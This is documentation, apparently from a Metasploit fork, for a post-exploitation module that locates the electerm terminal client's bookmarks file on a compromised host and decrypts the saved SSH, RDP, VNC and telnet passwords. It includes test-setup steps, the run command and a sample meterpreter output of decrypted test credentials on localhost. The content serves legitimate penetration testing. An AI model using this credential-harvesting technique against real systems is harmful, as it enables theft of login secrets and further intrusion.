adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
6d9d9a70d410cc94de4d3d9afd7a75cd426d43be
metasploit-gs/documentation/modules/post/multi/gather/electerm.md
T
三米前有蕉皮 c37b697b99 Update documentation/modules/post/multi/gather/electerm.md 
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2024-08-22 22:27:51 +08:00

56 lines
2.3 KiB
Markdown
Raw Blame History

## Vulnerable Application
electerm is free and open source Terminal/ssh/telnet/serialport/RDP/VNC/sftp client.
This module will determine if electerm is installed on the target system and, if it is, it will try to
dump all saved session information from the target. The passwords for these saved sessions will then be decrypted
where possible.
Any electerm version on any operating system are supported.
If it works normally, the connection name, host, username and password saved in the certificate file will be printed
### Installation Steps
1. Download and run the electerm installer (https://github.com/electerm/electerm/).
2. Select default installation
3. Open the software and create a connection
complete password setting, add the test account password to the certificate.
## Verification Steps
1. Get a session.
2. Do: `set session <session number>`
3. Do: `run post/multi/gather/credentials/electerm`
4. If the system has saved passwords, they will be printed out.
## Options
### BOOKMARKS_FILE_PATH
Specifies the `electerm.bookmarks.nedb` file path for electerm. (eg.
`C:\Users\FireEye\AppData\Roaming\electerm\users\default_user\electerm.bookmarks.nedb`).
## Scenarios
```
meterpreter > run post/windows/gather/credentials/electerm
[*] Gather electerm Passwords
[*] Looking for JSON files in /home/kali-team/.config/electerm/users/default_user/electerm.bookmarks.nedb
[+] electerm electerm.bookmarks.nedb saved to /home/kali-team/.msf4/loot/20240816195518_default_127.0.0.1_electerm.creds_806863.txt
[*] Finished processing /home/kali-team/.config/electerm/users/default_user/electerm.bookmarks.nedb
[+] Passwords stored in: /home/kali-team/.msf4/loot/20240816195518_default_127.0.0.1_host.electerm_421975.txt
[+] electerm Password
=================
Title Type Host Port Username Password Description
----- ---- ---- ---- -------- -------- -----------
127.0.0.1 22 ssh asdasdawdasdw
127.0.0.1 22 asdas asdasdas
drp rdp 127.0.0.1 3389 drp drppass rdp test
telnet telnet 127.0.0.1 23 root guest telnet des
vnc vnc 127.0.0.1 5900 vncuser vncpass vnc des
[*] Post module execution completed
meterpreter >
```
Reference in New Issue View Git Blame Copy Permalink